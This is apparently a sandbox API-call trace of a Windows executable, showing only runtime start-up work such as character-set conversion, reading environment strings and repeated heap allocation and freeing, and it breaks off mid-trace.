| out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0117.670] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0117.671] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0117.671] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1000) returned 0x487b60 [0117.671] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0117.671] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0117.671] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0117.671] AreFileApisANSI () returned 1 [0117.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0117.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0117.671] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xcd) returned 0x474b40 [0117.671] GetEnvironmentStringsW () returned 0x488b70* [0117.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4e6) returned 0x489550 [0117.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x489550, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0117.672] FreeEnvironmentStringsW (penv=0x488b70) returned 1 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x118) returned 0x47a370 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1f) returned 0x47b2b0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2e) returned 0x47e500 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x31) returned 0x47e240 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x480c20 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x31) returned 0x47e380 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4744c0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b4f0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd) returned 0x473fb0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1d) returned 0x47b3a0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x31) returned 0x47e4c0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x15) returned 0x4794a0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x17) returned 0x473cb0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x4725f0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x69) returned 0x473eb0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3e) returned 0x480630 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1d) returned 0x47b550 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x480bd0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x475660 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x475680 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1b) returned 0x47b3d0 [0117.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1e) returned 0x47b400 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x29) returned 0x47e280 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1e) returned 0x47af20 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x6b) returned 0x47b5c0 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x17) returned 0x474810 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xf) returned 0x474830 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x16) returned 0x474070 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2a) returned 0x47e3c0 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x29) returned 0x47e140 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x474090 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x21) returned 0x47b520 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x16) returned 0x489a90 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x22) returned 0x47b160 [0117.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x489d50 [0117.673] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489550 | out: hHeap=0x470000) returned 1 [0117.674] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa3a7) returned 0x489e50 [0117.675] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47af50 [0117.675] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa3a7) returned 0x494200 [0117.676] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.676] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfef7) returned 0x49e5b0 [0117.890] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x4809a0 [0117.890] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfef7) returned 0x4ae4b0 [0117.892] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47af50 | out: hHeap=0x470000) returned 1 [0117.892] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e5b0 | out: hHeap=0x470000) returned 1 [0117.893] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x450) returned 0x488b70 [0117.893] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x450) returned 0x488fd0 [0117.893] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.893] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1ea7) returned 0x489e50 [0117.894] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf40) returned 0x4be3b0 [0117.894] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x7a0) returned 0x4bf300 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xbf0) returned 0x4be3b0 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488fd0 | out: hHeap=0x470000) returned 1 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf300 | out: hHeap=0x470000) returned 1 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x640) returned 0x488b70 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1247) returned 0x489e50 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x520) returned 0x488b70 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b56) returned 0x4be3b0 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8a0) returned 0x488b70 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28ed) returned 0x489e50 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x550) returned 0x488b70 [0117.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2537) returned 0x48c750 [0117.895] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12b7) returned 0x4be3b0 [0117.896] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x950) returned 0x4bf670 [0117.896] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48c750 | out: hHeap=0x470000) returned 1 [0117.896] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.896] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3d4f) returned 0x48c750 [0117.896] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.896] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf670 | out: hHeap=0x470000) returned 1 [0117.896] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2377) returned 0x489e50 [0117.896] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x11d7) returned 0x4be3b0 [0117.896] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8e0) returned 0x4bf590 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf590 | out: hHeap=0x470000) returned 1 [0117.897] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5b0) returned 0x488b70 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.897] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x640) returned 0x488b70 [0117.897] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5be2) returned 0x49e5b0 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48c750 | out: hHeap=0x470000) returned 1 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.897] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x890) returned 0x488b70 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.897] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xac0) returned 0x488b70 [0117.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47b190 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x960) returned 0x488b70 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x960) returned 0x4be3b0 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x460) returned 0x488b70 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe0f) returned 0x4bed20 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c17) returned 0x4a41a0 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe00) returned 0x488b70 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x700) returned 0x4be3b0 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a41a0 | out: hHeap=0x470000) returned 1 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x153d) returned 0x4a41a0 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bed20 | out: hHeap=0x470000) returned 1 [0117.898] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.898] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2277) returned 0x4a56f0 [0117.899] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1157) returned 0x4be3b0 [0117.899] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8a0) returned 0x4bf510 [0117.899] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a56f0 | out: hHeap=0x470000) returned 1 [0117.899] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.899] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1fc7) returned 0x4a56f0 [0117.899] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a41a0 | out: hHeap=0x470000) returned 1 [0117.899] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bf510 | out: hHeap=0x470000) returned 1 [0117.899] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1657) returned 0x4be3b0 [0117.899] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xb20) returned 0x488b70 [0117.899] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x590) returned 0x4bfa10 [0117.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.900] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2f96) returned 0x4a76c0 [0117.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a56f0 | out: hHeap=0x470000) returned 1 [0117.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bfa10 | out: hHeap=0x470000) returned 1 [0117.900] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2b47) returned 0x4a41a0 [0117.900] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x15b7) returned 0x4be3b0 [0117.900] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xad0) returned 0x488b70 [0117.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a41a0 | out: hHeap=0x470000) returned 1 [0117.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2697) returned 0x4a41a0 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1367) returned 0x4be3b0 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9a0) returned 0x4a6840 [0117.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a41a0 | out: hHeap=0x470000) returned 1 [0117.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x474d) returned 0x489e50 [0117.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a76c0 | out: hHeap=0x470000) returned 1 [0117.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a6840 | out: hHeap=0x470000) returned 1 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x920) returned 0x488b70 [0117.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b47) returned 0x4be3b0 [0117.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xd90) returned 0x488b70 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6d0) returned 0x48e5b0 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48e5b0 | out: hHeap=0x470000) returned 1 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5d0) returned 0x488b70 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6adf) returned 0x4a41a0 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1887) returned 0x4be3b0 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc30) returned 0x488b70 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x620) returned 0x4aac90 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.902] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4aac90 | out: hHeap=0x470000) returned 1 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8f0) returned 0x488b70 [0117.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x480) returned 0x489470 [0117.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x240) returned 0x47c460 [0117.903] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0117.903] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489470 | out: hHeap=0x470000) returned 1 [0117.903] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47c460 | out: hHeap=0x470000) returned 1 [0117.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x481260 [0117.903] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b190 | out: hHeap=0x470000) returned 1 [0117.903] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e5b0 | out: hHeap=0x470000) returned 1 [0117.904] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a41a0 | out: hHeap=0x470000) returned 1 [0117.904] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481260 | out: hHeap=0x470000) returned 1 [0117.904] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9900) returned 0x489e50 [0117.956] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bf0) returned 0x4be3b0 [0117.958] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9937) returned 0x49e5b0 [0117.960] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47af50 [0117.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9900) returned 0x489e50 [0117.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bf0) returned 0x4be3b0 [0117.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4be3b0 | out: hHeap=0x470000) returned 1 [0117.962] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9937) returned 0x4be3b0 [0117.963] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489e50 | out: hHeap=0x470000) returned 1 [0117.964] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x481440 [0117.964] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47af50 | out: hHeap=0x470000) returned 1 [0117.964] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x494200 | out: hHeap=0x470000) returned 1 [0117.965] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae4b0 | out: hHeap=0x470000) returned 1 [0117.965] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4809a0 | out: hHeap=0x470000) returned 1 [0117.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x489e50 [0117.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4a7ef0 [0117.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x474580 [0117.965] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4c7cf0 [0117.966] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489b70 [0117.966] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474580 | out: hHeap=0x470000) returned 1 [0117.966] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4daf00 [0117.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x489b30 [0117.967] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489b70 | out: hHeap=0x470000) returned 1 [0117.967] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x4ee110 [0117.968] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x47af50 